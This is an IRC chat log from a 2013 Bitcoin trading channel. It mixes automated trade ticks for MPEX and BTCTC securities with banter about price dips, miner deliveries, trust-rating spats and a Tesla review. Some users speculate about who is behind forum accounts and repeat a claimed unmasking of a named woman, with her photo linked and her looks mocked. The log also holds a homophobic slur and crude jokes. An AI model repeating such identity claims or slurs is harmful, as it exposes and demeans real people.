13:47:19 [MPEX] [S.DICE] 800 @ 0.00606903 = 4.8552 BTC [-] Feb 10 13:50:26 [BTCTC] [S.MPOE-PT] 1 @ 0.0007 BTC Feb 10 13:57:00 [MPEX] [S.MPOE] 4000 @ 0.0006312 = 2.5248 BTC [+] Feb 10 13:57:02 [MPEX] [S.MPOE] 33959 @ 0.00063121 = 21.4353 BTC [+] Feb 10 13:58:19 [MPEX] [S.MPOE] 8852 @ 0.00062314 = 5.516 BTC [-] Feb 10 13:58:21 [MPEX] [S.MPOE] 3848 @ 0.00062002 = 2.3858 BTC [-] Feb 10 14:00:55 [MPEX] [S.MPOE] 12364 @ 0.00062002 = 7.6659 BTC [-] Feb 10 14:02:28 [MPEX] [S.MPOE] 6000 @ 0.00062002 = 3.7201 BTC [-] Feb 10 14:04:25 [MPEX] [S.MPOE] 8906 @ 0.00063121 = 5.6216 BTC [+] Feb 10 14:04:27 [MPEX] [S.MPOE] 2444 @ 0.00063126 = 1.5428 BTC [+] Feb 10 14:10:35 [MPEX] [S.MPOE] 2350 @ 0.00062002 = 1.457 BTC [-] Feb 10 14:18:41 weekend dip Feb 10 14:20:46 haha usagi nice catch Feb 10 14:20:50 the dip is hapening! Feb 10 14:20:54 20.80 Feb 10 14:20:59 22.80 i mean Feb 10 14:21:21 ;;ticker Feb 10 14:21:22 BTCUSD ticker | Best bid: 22.79881, Best ask: 22.88000, Bid-ask spread: 0.08119, Last trade: 22.79881, 24 hour volume: 45295.99889934, 24 hour low: 22.75100, 24 hour high: 23.98961, 24 hour vwap: 23.42737 Feb 10 14:21:28 o lala Feb 10 14:21:51 well, we were moving too fast anyways Feb 10 14:22:48 [MPEX] [S.MPOE] 7197 @ 0.00062184 = 4.4754 BTC [+] Feb 10 14:23:21 What ever happened to pump and don't dump? Feb 10 14:24:20 lol Feb 10 14:24:29 volume isn't particularly high Feb 10 14:24:33 this is a supply side hickup Feb 10 14:24:52 hey im not panicking lol Feb 10 14:25:16 theres this dude who called in 23.20 as the high of 2013 Feb 10 14:25:16 ;;tslb Feb 10 14:25:19 Time since last block: 6 minutes and 19 seconds Feb 10 14:25:23 he can go suck a dick Feb 10 14:25:24 he may well be right. Feb 10 14:26:19 its the same dude who asked for a 1200 BTC loan Feb 10 14:27:12 to "get back on his feet" Feb 10 14:27:18 heh Feb 10 14:27:53 since he's always wrong well, i bet hes wrong again Feb 10 14:28:38 lol Feb 10 14:28:47 seems unlikely it stays under this week's max Feb 10 14:28:53 after all year barely began Feb 10 14:32:29 [MPEX] [S.MPOE] 8500 @ 0.00062184 = 5.2856 BTC [+] Feb 10 14:32:37 ;;tslb Feb 10 14:32:40 Time since last block: 8 minutes and 33 seconds Feb 10 14:36:59 yawn Feb 10 14:39:18 ieh Feb 10 14:39:24 we're back Feb 10 14:39:27 ;;ticker Feb 10 14:39:27 BTCUSD ticker | Best bid: 23.12580, Best ask: 23.29899, Bid-ask spread: 0.17319, Last trade: 23.29900, 24 hour volume: 49226.55134271, 24 hour low: 22.67000, 24 hour high: 23.98961, 24 hour vwap: 23.37203 Feb 10 14:47:12 [MPEX] [S.MPOE] 5703 @ 0.00062184 = 3.5464 BTC [+] Feb 10 14:47:14 [MPEX] [S.MPOE] 9297 @ 0.00062346 = 5.7963 BTC [+] Feb 10 14:49:21 [MPEX] [S.MPOE] 5353 @ 0.00062346 = 3.3374 BTC [+] Feb 10 14:49:23 [MPEX] [S.MPOE] 10347 @ 0.00062349 = 6.4513 BTC [+] Feb 10 14:56:52 [MPEX] [S.MPOE] 8546 @ 0.00062122 = 5.3089 BTC [-] Feb 10 14:57:41 [BTCTC] [BTC-BOND] 2 @ 0.01 = 0.02 BTC [+] Feb 10 14:57:55 [MPEX] [S.MPOE] 17000 @ 0.00062122 = 10.5607 BTC [-] Feb 10 15:02:25 mp, what have you done: http://www.bbc.co.uk/news/uk-21401111 Feb 10 15:02:31 [MPEX] [S.MPOE] 5454 @ 0.00062122 = 3.3881 BTC [-] Feb 10 15:02:37 [MPEX] [S.MPOE] 2850 @ 0.00062098 = 1.7698 BTC [-] Feb 10 15:02:39 [MPEX] [S.MPOE] 1896 @ 0.00062002 = 1.1756 BTC [-] Feb 10 15:03:08 sat dice still doesnt work for me Feb 10 15:03:13 I cant see the bets Feb 10 15:03:43 same prob for me last nite, the dymanic content is coming thru very slowly Feb 10 15:04:03 if you wait a while the betting table appears Feb 10 15:04:12 but not the totals Feb 10 15:04:22 i see it Feb 10 15:04:39 i see it now, i dont see the recent bets though Feb 10 15:05:36 ThickAsThieves wasn't me dood Feb 10 15:05:38 was the other guy Feb 10 15:07:01 horsemeat.. i know canada produces horsemeat and ships it to japan Feb 10 15:07:08 ive nver tried though Feb 10 15:09:18 so, mp you got some entrants for your SA trolling contest? Feb 10 15:09:50 like a dozen by now Feb 10 15:10:11 and horsemeat is great, i have a bit of salami in my fridge right now. Feb 10 15:10:25 mm Feb 10 15:11:04 [MPEX] [S.MPOE] 9950 @ 0.0006228 = 6.1969 BTC [+] Feb 10 15:11:17 ive had dove, snake, aborted duck fetus, dog, and who knows what Feb 10 15:11:37 all are fucking delicious. cept dog.. it was meh Feb 10 15:13:02 i never had dog Feb 10 15:13:04 oh, ive had one of those turtles as well' Feb 10 15:13:09 or snake or bs chinese stuff Feb 10 15:13:14 turtle soup ? Feb 10 15:13:18 yeap Feb 10 15:13:54 yeah thats nice Feb 10 15:22:47 [MPEX] [S.DICE] 389 @ 0.00606903 = 2.3609 BTC [-] Feb 10 15:23:57 https://bitcointalk.org/index.php?topic=101902.msg1516423#msg1516423 Feb 10 15:24:10 #popcorn Feb 10 15:29:48 [MPEX] [S.MPOE] 1600 @ 0.0006228 = 0.9965 BTC [+] Feb 10 15:29:49 [MPEX] [S.MPOE] 6296 @ 0.00062349 = 3.9255 BTC [+] Feb 10 15:29:51 [MPEX] [S.MPOE] 4500 @ 0.00062723 = 2.8225 BTC [+] Feb 10 15:29:53 [MPEX] [S.MPOE] 5865 @ 0.00063126 = 3.7023 BTC [+] Feb 10 15:32:48 [BTCTC] [BTC-BOND] 31 @ 0.01 = 0.31 BTC [+] Feb 10 15:43:00 brown sugar please why ? Feb 10 15:44:12 [MPEX] [S.MPOE] 6241 @ 0.00063126 = 3.9397 BTC [+] Feb 10 15:44:14 [MPEX] [S.MPOE] 4698 @ 0.00063799 = 2.9973 BTC [+] Feb 10 15:44:22 [MPEX] [S.MPOE] 4261 @ 0.00063812 = 2.719 BTC [+] Feb 10 15:49:12 [MPEX] [S.MPOE] 10500 @ 0.00062987 = 6.6136 BTC [-] Feb 10 15:49:12 [MPEX] [S.MPOE] 35100 @ 0.00062002 = 21.7627 BTC [-] Feb 10 15:52:24 i thought EskimoBob liked mp Feb 10 15:56:12 I'm buying 10,000 pizzas with 2 BTC. hit me up, Feb 10 15:56:57 actually it might be a good PR for bitcoin. donate the pizzas to people everywhere Feb 10 15:58:15 may 22 would be a good date, the day laszlo got his pizza Feb 10 16:09:56 this is actually a good idea Feb 10 16:10:04 have an international day of bitcoin pizza Feb 10 16:10:11 just go out give some dood a pizza, put on youtube Feb 10 16:12:36 [MPEX] [S.MPOE] 12400 @ 0.00063812 = 7.9127 BTC [+] Feb 10 16:16:24 [BTCTC] [SYNERGY] 3 @ 0.081 = 0.243 BTC [+] Feb 10 16:16:26 [BTCTC] [SYNERGY] 3 @ 0.0926 = 0.2778 BTC [+] Feb 10 16:16:28 [BTCTC] [SYNERGY] 1 @ 0.0928 BTC [+] Feb 10 16:17:04 [MPEX] [S.MPOE] 5989 @ 0.00063812 = 3.8217 BTC [+] Feb 10 16:17:10 [MPEX] [S.MPOE] 4111 @ 0.00063816 = 2.6235 BTC [+] Feb 10 16:24:40 [MPEX] [S.MPOE] 14700 @ 0.00063816 = 9.381 BTC [+] Feb 10 16:33:29 [BTCTC] [B.YABMC] 10 @ 0.0249 = 0.249 BTC [+] Feb 10 16:34:46 [BTCTC] [B.YABMC] 5 @ 0.0249 = 0.1245 BTC [+] Feb 10 16:41:19 [MPEX] [S.MPOE] 8232 @ 0.00063387 = 5.218 BTC [-] Feb 10 16:44:56 [MPEX] [S.MPOE] 3650 @ 0.00063816 = 2.3293 BTC [+] Feb 10 16:48:57 selling 50 ASICMINER shares at 0.44 BTC each Feb 10 16:49:52 [MPEX] [S.MPOE] 3739 @ 0.00063816 = 2.3861 BTC [+] Feb 10 16:49:54 [MPEX] [S.MPOE] 3315 @ 0.00063924 = 2.1191 BTC [+] Feb 10 16:53:10 EskimoBob: if you know how to do things properly, go do it. make your own exchange Feb 10 16:53:28 otherwise i don't know what you hope to achieve Feb 10 16:54:14 he's a troll Feb 10 16:55:38 i'm always interested in one's original intention. troll or not. Feb 10 16:55:57 and EskimoBob is so far complete mystery Feb 10 16:57:04 "just a hater" classification won't satisfy me Feb 10 16:58:49 what now ? Feb 10 16:58:53 [MPEX] [S.MPOE] 6309 @ 0.00063924 = 4.033 BTC [+] Feb 10 17:00:34 not needed, there are already a dozen exchanges. i'm sure someone would welcome his expert consulting services Feb 10 17:03:16 then do better. or at least write blog about it. Feb 10 17:03:51 i think it isn't by chance that some do blog about their business and others do not. Feb 10 17:04:05 loooooooooooooooool Feb 10 17:06:22 there were some computations of mpex mkt cap around...and if you think you can do it better, then it would be worth much more, ofc Feb 10 17:10:22 [MPEX] [S.MPOE] 14900 @ 0.00064055 = 9.5442 BTC [+] Feb 10 17:10:24 [MPEX] [S.MPOE] 2850 @ 0.00064096 = 1.8267 BTC [+] Feb 10 17:10:28 [MPEX] [S.MPOE] 200 @ 0.00064168 = 0.1283 BTC [+] Feb 10 17:12:26 [MPEX] [S.MPOE] 12827 @ 0.00063972 = 8.2057 BTC [-] Feb 10 17:12:28 [MPEX] [S.MPOE] 1568 @ 0.00063568 = 0.9967 BTC [-] Feb 10 17:12:31 [MPEX] [S.MPOE] 9655 @ 0.0006313 = 6.0952 BTC [-] Feb 10 17:15:28 mp, are you TradeFortress on bittalk? Feb 10 17:16:04 why do you ask that? Feb 10 17:16:15 almost surely, he isnt tradefortress Feb 10 17:17:26 well i havent followed TF or anything, just saw some posts that were in line with mp comments here Feb 10 17:17:38 and appearing in places where MPOE-PR comments Feb 10 17:18:04 and never saw a user with mp's name on bittalk, so figured TF might be him Feb 10 17:18:19 nothing scandalous, just wondering Feb 10 17:19:19 TradeFortress shows up here sometimes with MP simultaneously Feb 10 17:20:13 word Feb 10 17:20:21 still not impossible Feb 10 17:20:26 [MPEX] [S.MPOE] 2150 @ 0.00064168 = 1.3796 BTC [+] Feb 10 17:20:28 but no biggie Feb 10 17:21:12 [MPEX] [S.DICE] 961 @ 0.00620896 = 5.9668 BTC [+] Feb 10 17:21:26 ThickAsThieves nope ? Feb 10 17:21:44 i don't have a btctalk acct art all, mpoe-pr does the foruming for me Feb 10 17:21:55 word Feb 10 17:22:54 Tradefortress made a topic that has an starts with "I" in the in the topic title, I don't think mp would make a blunder like that Feb 10 17:24:30 Okay, not start with 'I' but close enough Feb 10 17:24:30 https://bitcointalk.org/index.php?topic=135110.0 Feb 10 17:24:34 [MPEX] [S.MPOE] 2610 @ 0.00064168 = 1.6748 BTC [+] Feb 10 17:24:36 [MPEX] [S.MPOE] 3590 @ 0.00064204 = 2.3049 BTC [+] Feb 10 17:24:38 [BTCTC] [B.YABMC] 1 @ 0.0249 BTC [+] Feb 10 17:24:44 we should investigate this much further Feb 10 17:25:23 tradefortress is a tool, he tried to fork freicoin and attack it but forgot to make his code actuallu work Feb 10 17:25:26 also his firstbits is 1glados Feb 10 17:25:37 mp doesnt play vidja Feb 10 17:26:10 i kidding Feb 10 17:26:18 like i said, it was just a random though Feb 10 17:26:21 t Feb 10 17:26:35 i once wanted to oust mp as sacha baron cohen.. still think that would be much better plan than some random forum dude Feb 10 17:26:55 i had the same thoughts! Feb 10 17:27:06 Omg Feb 10 17:27:21 Borat as owner of MPEX Feb 10 17:27:22 lol Feb 10 17:29:09 i think the guy is a kid trying things out Feb 10 17:29:21 i recall he was making some sort of project that didn't work but no speciffics. Feb 10 17:29:34 o wait, the bitoicn gem ripoff ? Feb 10 17:30:19 yeah Feb 10 17:30:21 the gold bar Feb 10 17:30:23 jurov you know if you could get cohen to do it it'd prolly kick all ass Feb 10 17:30:51 oh and di you knew our friend here usagi uncovered mpoe-pr to be erin pavlina, a psychic from vegas? Feb 10 17:32:35 that was a while ago neh ? Feb 10 17:32:51 yes Feb 10 17:33:15 kinda ugly old woman i thought. Feb 10 17:33:26 coulda picked a better someone Feb 10 17:35:22 http://www.erinpavlina.com/images/erin-injured.jpg Feb 10 17:35:28 fortunately later inaba got a doxing fever and inadvertently confirmed beyond doubt her real identity and her ties with mp/polimedia Feb 10 17:36:04 lol Feb 10 17:36:04 ^ twas awhile ago, too. just executive summary for newbs. Feb 10 17:36:17 is there an insrtance where inaba set to do something Feb 10 17:36:22 and didn't end up doing the exact oposite ? Feb 10 17:37:20 a, here we go https://bitcointalk.org/index.php?topic=101902.msg1516695#msg1516695 Feb 10 17:37:28 [MPEX] [S.MPOE] 2900 @ 0.00064116 = 1.8594 BTC [-] Feb 10 17:40:57 [MPEX] [S.MPOE] 14960 @ 0.00064204 = 9.6049 BTC [+] Feb 10 17:41:00 [MPEX] [S.MPOE] 2040 @ 0.00064243 = 1.3106 BTC [+] Feb 10 17:42:34 [MPEX] [S.MPOE] 2737 @ 0.00064116 = 1.7549 BTC [-] Feb 10 17:42:35 [MPEX] [S.MPOE] 15763 @ 0.00063473 = 10.0052 BTC [-] Feb 10 17:43:34 [MPEX] [S.MPOE] 2650 @ 0.00063473 = 1.682 BTC [-] Feb 10 17:44:42 it used to be Feb 10 17:44:56 used to have ads all over the place here to sell milk in the 80s Feb 10 17:45:03 "Milk, it does a body good." Feb 10 17:45:10 to drink like 5~6 glasses a day Feb 10 17:45:17 thats kinda what i do atm Feb 10 17:45:25 even though your body can only absorb like 3 glasses worth of calcium a day Feb 10 17:45:36 but milk is good Feb 10 17:45:55 you drink D, 1%, 2%, skim? half/half? Feb 10 17:46:05 4.6% Feb 10 17:46:09 0,o Feb 10 17:46:11 D Feb 10 17:46:12 then Feb 10 17:46:15 a gallon is good for ~ 5-6 days Feb 10 17:46:37 mircea_popescu: We call that D milk here. Feb 10 17:46:40 aha Feb 10 17:46:45 My personal preference Feb 10 17:46:51 the lesser stuff is too watery Feb 10 17:46:51 it is better if coming out of D cups yes. Feb 10 17:46:58 haha Feb 10 17:46:59 :p Feb 10 17:47:02 brb Feb 10 17:47:02 thats a diff type of milk Feb 10 17:47:03 :P Feb 10 17:47:18 same Feb 10 17:47:19 sleep time Feb 10 17:47:21 afk Feb 10 17:47:24 usagi: thanks again for that help Feb 10 17:56:04 [MPEX] [S.MPOE] 2887 @ 0.00063473 = 1.8325 BTC [-] Feb 10 17:57:31 [MPEX] [S.MPOE] 11815 @ 0.00063159 = 7.4622 BTC [-] Feb 10 17:57:32 [MPEX] [S.MPOE] 2035 @ 0.0006313 = 1.2847 BTC [-] Feb 10 18:00:00 we now have a thread about pussies in bitcointalk Feb 10 18:00:00 https://bitcointalk.org/index.php?topic=142318.40 Feb 10 18:01:34 this ones for mircea_popescu : http://qkme.me/3sx5kp?id=229974649 Feb 10 18:06:16 [MPEX] [S.MPOE] 9800 @ 0.0006313 = 6.1867 BTC [-] Feb 10 18:19:17 [BTCTC] [S.BBET-PT] 894 @ 0.002 = 1.788 BTC [+] Feb 10 18:20:48 [MPEX] [S.MPOE] 3810 @ 0.0006313 = 2.4053 BTC [-] Feb 10 18:20:50 [MPEX] [S.MPOE] 7150 @ 0.00062889 = 4.4966 BTC [-] Feb 10 18:20:50 [MPEX] [S.MPOE] 190 @ 0.0006284 = 0.1194 BTC [-] Feb 10 18:22:10 [MPEX] [S.MPOE] 5060 @ 0.00063414 = 3.2087 BTC [+] Feb 10 18:23:11 that 2.5 mil shares way above the marketline, that's erik's right? Feb 10 18:23:16 lol Feb 10 18:23:43 Bowjob i think they were there since long ago Feb 10 18:23:44 no ? Feb 10 18:24:20 0.01750000 1`000`000 0.01000000 2`500`000 Feb 10 18:24:29 mhm, i don't remember seeing it Feb 10 18:24:50 then again I never really look up that high lol Feb 10 18:25:55 maybe. im not even sure Feb 10 18:29:37 [MPEX] [S.MPOE] 14090 @ 0.00063414 = 8.935 BTC [+] Feb 10 18:29:39 [MPEX] [S.MPOE] 5399 @ 0.00063461 = 3.4263 BTC [+] Feb 10 18:35:40 hey everyone Feb 10 18:36:08 hi Feb 10 18:37:24 what's new? Feb 10 18:37:50 nothing much, bfl delivered, pirate paid, hell froze over... Feb 10 18:41:43 only one of those really happened Feb 10 18:41:50 mjr_: now it's your job to find out which one Feb 10 18:42:26 you dont think bfl will deliver? Feb 10 18:42:27 bfl delivered? Feb 10 18:42:38 nope, bfl didnt deliver. Feb 10 18:42:43 (nothing much) was the correct answer Feb 10 18:42:48 hell must have frozen over then Feb 10 18:42:49 correct! Feb 10 18:42:53 lol Feb 10 18:43:12 jeff's asic paid for itself in 9 days Feb 10 18:43:16 yep Feb 10 18:43:17 that is pretty crazy Feb 10 18:43:30 but i guess the spike in price made it faster Feb 10 18:43:52 I think BFL will deliver maybe 25% of orders in early march and fill all orders by April, ASICMINER will go online next weekend, and Avalons will trickle out very slowly starting at the end of the month Feb 10 18:44:28 that's my best guesstimate from what i've read at least... Feb 10 18:45:29 that'll make whoever made the big bfl bet pretty happy. Feb 10 18:45:59 [MPEX] [S.MPOE] 1476 @ 0.00063461 = 0.9367 BTC [+] Feb 10 18:46:01 [MPEX] [S.MPOE] 3300 @ 0.00063507 = 2.0957 BTC [+] Feb 10 18:46:02 [MPEX] [S.MPOE] 6824 @ 0.00063768 = 4.3515 BTC [+] Feb 10 18:47:59 that bet will be right on the delivery line I bet, hopefully it'll be a nailbiter Feb 10 18:48:04 [MPEX] [S.MPOE] 1000 @ 0.00062841 = 0.6284 BTC [-] Feb 10 18:48:06 [MPEX] [S.MPOE] 3416 @ 0.0006284 = 2.1466 BTC [-] Feb 10 18:50:39 [BTCTC] [BTC-BOND] 2 @ 0.01 = 0.02 BTC [+] Feb 10 18:58:59 [BTCTC] [COGNITIVE] 1 @ 0.33 BTC [+] Feb 10 18:59:16 [MPEX] [S.MPOE] 1994 @ 0.0006284 = 1.253 BTC [-] Feb 10 18:59:18 [MPEX] [S.MPOE] 6100 @ 0.00062593 = 3.8182 BTC [-] Feb 10 18:59:21 [MPEX] [S.MPOE] 1677 @ 0.00062532 = 1.0487 BTC [-] Feb 10 19:02:42 [BTCTC] [B.YABMC] 1 @ 0.0248 BTC [-] Feb 10 19:04:44 [MPEX] [S.MPOE] 9376 @ 0.00063768 = 5.9789 BTC [+] Feb 10 19:04:46 [MPEX] [S.MPOE] 12810 @ 0.00064243 = 8.2295 BTC [+] Feb 10 19:04:53 [MPEX] [S.MPOE] 2338 @ 0.00064267 = 1.5026 BTC [+] Feb 10 19:04:59 [MPEX] [S.MPOE] 7396 @ 0.00064275 = 4.7538 BTC [+] Feb 10 19:05:01 [MPEX] [S.MPOE] 3021 @ 0.0006428 = 1.9419 BTC [+] Feb 10 19:08:11 o hey, seems there's a little fun to play. Feb 10 19:08:19 ;;everify midnightmagic Feb 10 19:08:19 Error: In order to authenticate, you must be present in one of the following channels: #bitcoin-otc;#bitcoin-otc-foyer;#bitcoin-otc-ru;#bitcoin-otc-eu;#bitcoin-otc-uk;#bitcoin-otc-bans Feb 10 19:08:20 ooops Feb 10 19:08:37 ;;eauth mircea_popescu Feb 10 19:08:38 Request successful for user mircea_popescu, hostmask mircea_popescu!~Mircea@pdpc/supporter/silver/mircea-popescu. Get your encrypted OTP from http://bitcoin-otc.com/otps/8A736F0E2FB7B452 Feb 10 19:09:02 ;;everify freenode:#bitcoin-otc:70718f15a4ccbc80065e1446f898b1dcd1a29f8c25ce0fdff2274276 Feb 10 19:09:03 You are now authenticated for user mircea_popescu with key 8A736F0E2FB7B452 Feb 10 19:09:41 ;;rate ne0futur -10 never traded/interacted with the person. prolly scammer getting uppity Feb 10 19:09:43 Hey evoorhees Feb 10 19:09:47 Rating entry successful. Your rating of -10 for user ne0futur has been recorded. Feb 10 19:09:51 ;;rate bobberb -10 never traded/interacted with the person. prolly scammer getting uppity Feb 10 19:09:52 Rating entry successful. Your rating of -10 for user bobberb has been recorded. Feb 10 19:10:01 hey hey Feb 10 19:10:11 dafuq mircea? Feb 10 19:10:15 i have no idea Feb 10 19:10:21 i guess the scammers are getting organised now. Feb 10 19:11:00 pretty sure ne0futur didn't deserve that Feb 10 19:11:13 evoorhees: how are things? seems like the s.dice website is having trouble Feb 10 19:11:21 Namworld he rated me -2. Feb 10 19:11:27 i have no idea who he is or wtf. Feb 10 19:11:31 hey got your message last night Feb 10 19:11:31 oh Feb 10 19:11:39 seems fine right now but we're lookin at it Feb 10 19:11:47 great Feb 10 19:11:54 I told you evoorhees to just keep the slice and put the next ones behind it Feb 10 19:12:06 ah yeah, working fine now Feb 10 19:12:10 Someone ought to eat into them eventually Feb 10 19:13:57 [BTCTC] [BTC-BOND] 1 @ 0.01 BTC [+] Feb 10 19:14:29 Nam, there are no asks on BBET passthrough fyi Feb 10 19:15:49 I need someone to sell me BBET first Feb 10 19:15:56 no one is Feb 10 19:16:07 and 0.002 is way too high Feb 10 19:16:32 Namworld ill tell you it's suspicious as all hell, account active feb-june 2011 suddenly pops up to neg me ? Feb 10 19:17:28 I know the guy, BitVPS client, he's an affiliate. Advertises us a lot in #bitcoin-hosting Feb 10 19:17:40 well then why is he sockpuppeting the wot ? Feb 10 19:18:12 2013-02-10 06:46:05 / 2013-02-10 06:46:36 Feb 10 19:18:20 [MPEX] [S.MPOE] 5300 @ 0.00062532 = 3.3142 BTC [-] Feb 10 19:18:21 like hell that's a coincidence, that's the same person there. Feb 10 19:20:15 Looks like it's for GIGA.ETF Feb 10 19:21:38 to me it looks like it's for not having something better to do with his time. Feb 10 19:22:00 i literally don't think i have ever talked to the guy, at all. Feb 10 19:22:14 he read the post, felthe should reflect the trust in the WoT, and did Feb 10 19:22:24 with both his account and his sock ? Feb 10 19:22:37 i'm gonna ask him about that Feb 10 19:23:00 leaving aside the point about how the wot is for interaction not hearsay. Feb 10 19:23:00 i don't think its a sock, i bet they were talking about it in the channel and someone else was upset too Feb 10 19:23:24 oh you had interaction with genjix and pirate? Feb 10 19:23:28 yes. Feb 10 19:23:55 dafuq did you imagine ?! Feb 10 19:24:01 tell me about it Feb 10 19:24:12 lets go with genjix since we've heard enough about pirate Feb 10 19:24:36 I thought ratings were for reflecting how much trust you have for someone Feb 10 19:24:37 he fakereported dtng for "child porn". i had to threaten to sue him. Feb 10 19:24:41 regardless of interactions Feb 10 19:24:48 Namworld i thought its for business rather than gossip Feb 10 19:24:49 that's how most of us use it Namworld Feb 10 19:24:53 then again i might be off base for there. Feb 10 19:25:20 but anyway : anyone want free -10s they're welcome to neg me out of the blue, i'll oblige. Feb 10 19:25:35 and if there's cause for a sock war, we'll do a sock war too. Feb 10 19:25:41 technology, what can you do. gotta explore it. Feb 10 19:25:41 look at the -otc logs Feb 10 19:25:45 its not a sock Feb 10 19:25:47 i am not in otc. Feb 10 19:25:51 people can agree without being socks Feb 10 19:25:55 this is true. Feb 10 19:26:27 i'll happily go on what things look like from where i'm sitting rather than what things "are". Feb 10 19:26:42 hehe ok Feb 10 19:26:51 I knew that already though Feb 10 19:26:54 yeah. Feb 10 19:27:46 [MPEX] [S.MPOE] 3411 @ 0.0006363 = 2.1704 BTC [+] Feb 10 19:27:48 [MPEX] [S.MPOE] 10350 @ 0.00063891 = 6.6127 BTC [+] Feb 10 19:27:49 [MPEX] [S.MPOE] 689 @ 0.0006428 = 0.4429 BTC [+] Feb 10 19:27:51 anyway, i knew from the get-go that as long as the girl continues to push the wot there's sooner or later going to be some smartassery. so, whatev. Feb 10 19:28:03 color me trolled. Feb 10 19:28:39 :;rate mircea_popescu -1 Where's my free -10 rating? I want it NAOW! Feb 10 19:28:44 lmao Feb 10 19:29:05 Hey, it's free Feb 10 19:29:14 ;:rate namworld -0x0A newb. Feb 10 19:29:26 [BTCTC] [BTC-BOND] 63 @ 0.01 = 0.63 BTC [+] Feb 10 19:31:45 Wow, it's even in fancy exadecimal. Free and luxurious. Feb 10 19:31:46 http://satoshitemple.com/index.html today it's extra lulzy Feb 10 19:33:01 hexa* Feb 10 19:33:01 almost sounds like a bait for true satoshi to come and explicitly distance himself from that site Feb 10 19:33:23 I think the last line is the punchline xD Feb 10 19:34:30 kinda platitudinous neh ? Feb 10 19:36:07 i like the meditation space Feb 10 19:36:09 hm github dead ? Feb 10 19:36:09 http://satoshitemple.com/meditation-space.html Feb 10 19:36:24 nm false alarm Feb 10 19:40:56 github is gonna get bought out soon Feb 10 19:41:02 "inside information" Feb 10 19:43:02 http://trilema.com/2013/new-mpex-key/ Feb 10 19:43:07 jurov ^ Feb 10 19:45:00 hrm Feb 10 19:45:50 mircea_popescu: are we allowed to reupload keys if they expire? Feb 10 19:45:52 lookg like gpg 2.0 uses different switches Feb 10 19:46:12 thestringpuller not rly Feb 10 19:46:21 gpg --recv-keys CFE0F3E1 instead... will go through and post a comment Feb 10 19:46:49 so why do you get to have expiring keys and we don't? Feb 10 19:46:50 HMMMMMM Feb 10 19:46:53 they changes searchkeys ? Feb 10 19:47:07 thestringpuller well what'd you want, fairness ? Feb 10 19:47:14 YESSIR! Feb 10 19:47:24 it's all a ploy to force ppl to buy more and more keys. Feb 10 19:47:33 sounds like it Feb 10 19:48:48 aaah seems your wordpress converted -- into ndashes Feb 10 19:48:51 i fixed it Feb 10 19:48:53 sorry ;/ Feb 10 19:50:51 googletalk forum members won't be pleased to hear this news... http://allthingsd.com/20130208/google-chairman-eric-schmidt-to-sell-up-to-42-percent-of-stake/ Feb 10 19:51:25 O MAY GAWD Feb 10 19:51:27 DUMPING Feb 10 19:51:50 this is too funny. ima have the girl post. Feb 10 19:52:52 evoorhees should spew stuff like "long-term strategy of individual asset diversification and liquidity" on btctalk Feb 10 19:53:49 Needs to diversify into S.MPOE Feb 10 19:54:26 allthings satoshidice wow Feb 10 19:54:47 lol Feb 10 19:55:00 Bugpowder dude, if he takes half that dough and buys btc Feb 10 19:56:33 Elon has got to be fucking pissed at this review Feb 10 19:56:34 http://www.nytimes.com/2013/02/10/automobiles/stalled-on-the-ev-highway.html?pagewanted=1&hpw Feb 10 19:57:03 [MPEX] [S.MPOE] 7790 @ 0.0006428 = 5.0074 BTC [+] Feb 10 19:57:04 maybe the teslas just suck ? :D Feb 10 19:57:04 [MPEX] [S.MPOE] 2500 @ 0.00064297 = 1.6074 BTC [+] Feb 10 19:57:05 [MPEX] [S.MPOE] 1110 @ 0.00064304 = 0.7138 BTC [+] Feb 10 19:57:35 yea, there's funny comment below article "why they can't just add propane heating?" Feb 10 19:59:03 [MPEX] [S.MPOE] 18100 @ 0.00063456 = 11.4855 BTC [-] Feb 10 19:59:05 [MPEX] [S.MPOE] 4000 @ 0.00062532 = 2.5013 BTC [-] Feb 10 19:59:05 but srsly, for that price good insulation + air heat exchanged is thinkable Feb 10 19:59:17 not in california, tho Feb 10 19:59:23 *exchanger Feb 10 20:01:25 [BTCTC] [SYNERGY] 6 @ 0.081 = 0.486 BTC [-] Feb 10 20:02:52 [BTCTC] [GSDPT] 100 @ 0.0062 = 0.62 BTC [+] Feb 10 20:02:59 cause of this they'll fall flat in most of yurp, too Feb 10 20:03:16 Feeding the 416 horsepower motor of the top-of-the-line Model S Performance edition is a half-ton lithium-ion battery pack slung beneath the cockpit Feb 10 20:03:22 srsly now... half ton battery ? Feb 10 20:03:28 what if that thing catches on fire Feb 10 20:04:25 they apparently agineered battery pack to avoid fire: http://www.flightglobal.com/news/articles/elon-musk-boeing-787-battery-fundamentally-unsafe-381627/ Feb 10 20:04:33 derp, *engineered Feb 10 20:05:55 but still, if you crash tesla in sufficient speed... remains to be seen. maybe rkoi do such experiment soon Feb 10 20:06:22 [MPEX] [S.MPOE] 3890 @ 0.00064304 = 2.5014 BTC [+] Feb 10 20:06:24 [MPEX] [S.MPOE] 4410 @ 0.00064305 = 2.8359 BTC [+] Feb 10 20:06:30 scary thing Feb 10 20:06:51 According to the tesla forums, the battery drain when he parked overnight was becuase the battery pack actively heats itself during cold weather to keep the pack healthy. Feb 10 20:07:08 Anyway, Tesla is an LA car Feb 10 20:07:13 pretty much Feb 10 20:07:23 So if I get an LA job Feb 10 20:07:27 I will need an LA car Feb 10 20:07:30 :) Feb 10 20:07:44 Their problem is their engineers are all in LA Feb 10 20:08:10 so the weather is just not on their awareness Feb 10 20:08:34 cant get girl cause i dont have acar, cant get a car cause i dont have a job, cant get a job cause i dont have a gun now im looking for a girl with a car and a house and a job and a gun and cable in la Feb 10 20:08:43 they don't need AC in LA either? Feb 10 20:08:54 its equally power hungry Feb 10 20:09:15 in la they have lightning Feb 10 20:10:20 It never goes below 0C in LA Feb 10 20:10:30 A trip to Mammoth or Tahoe though... Feb 10 20:10:34 could be an issue Feb 10 20:10:54 Nearing New York, I made the first of several calls to Tesla officials about my creeping range anxiety. The woman who had delivered the car told me to turn off the cruise control; company executives later told me that advice was wrong. All the while, my feet were freezing and my knuckles were turning white. Feb 10 20:10:55 lmo Feb 10 20:11:01 the shit people do to be cool Feb 10 20:11:33 what's cooler than being cool? Feb 10 20:11:40 ice cold! Feb 10 20:11:44 tesla should include wire with hooks to ninja-connect to overhead wires Feb 10 20:12:02 jurov i was thinking actually, having a little antenna like a trolley... Feb 10 20:12:04 might work Feb 10 20:12:14 make th car in the shape of a ladybug Feb 10 20:12:25 all the la fags would prolly be all over it. Feb 10 20:12:33 [MPEX] [S.MPOE] 11500 @ 0.00064305 = 7.3951 BTC [+] Feb 10 20:12:41 